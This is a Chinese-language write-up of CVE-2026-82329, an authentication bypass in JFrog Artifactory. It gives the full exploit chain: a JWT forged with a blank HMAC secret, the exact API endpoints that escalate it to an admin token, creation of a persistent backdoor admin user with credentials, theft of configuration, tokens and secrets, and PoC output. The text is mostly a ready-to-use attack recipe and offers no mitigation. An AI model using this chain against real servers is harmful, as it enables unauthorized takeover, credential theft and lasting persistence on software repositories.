CVE-2026-82329 — JFrog Artifactory 认证绕过
漏洞详情
JFrog Artifactory(版本 7.111.20、7.117.27、7.125.19、7.133.28、7.146.37、7.161.19)中存在严重的认证绕过漏洞。该缺陷允许未认证的攻击者使用空白 HMAC 密钥(32 字节的 0x20)伪造 JWT,生成管理员令牌,并创建后门用户。
漏洞利用链
步骤 操作 1 使用 alg=HS256、kid=SHA256("")、skip_node_registration=true 伪造 JWT 2 将 JWT 发送至 /access/api/v1/registry/join → 获取 SERVICE 令牌 3 通过 /access/api/v1/tokens 将 SERVICE 令牌兑换为 ADMIN 令牌 4 通过 /artifactory/api/system/configuration、/access/api/v1/tokens、/artifactory/api/system/version 验证管理员访问权限 5 通过 /artifactory/api/security/users/{user} 创建持久化管理员用户 6 窃取配置、令牌、用户、仓库、机密信息 7 为高价值主体伪造令牌
攻击流程
BLANK_SECRET = b"\x20" * 32
↓
伪造 JWT(HS256,kid=hashlib.sha256(""))
↓
POST /access/api/v1/registry/join
↓
SERVICE 令牌(scp=admin)
↓
POST /access/api/v1/tokens
↓
ADMIN 令牌(scp=applied-permissions/admin,aud=*)
↓
验证管理员权限(GET /artifactory/api/system/configuration → 200)
↓
PUT /artifactory/api/security/users/0xTerror
↓
持久化管理员用户:0xTerror:Terrorp0c!7777
↓
窃取:配置、令牌、用户、仓库、机密信息
↓
横向移动检查:Xray、Mission Control、Distribution 等
↓
为高价值主体伪造令牌
PoC 输出示例
[+] 步骤 1 /registry/join -> HTTP 201 SERVICE 令牌(scp=admin)
[+] 步骤 2 /access/api/v1/tokens -> HTTP 200 ADMIN 令牌(scp=applied-permissions/admin)
[+] 步骤 3 管理员权限验证:config=200、tokens=200、version=200
[+] 步骤 4 创建管理员用户 '0xTerror' -> HTTP 201
[=] 存在漏洞 — 未认证攻击者已获取 ADMIN 权限
管理员用户:0xTerror:Terrorp0c!7777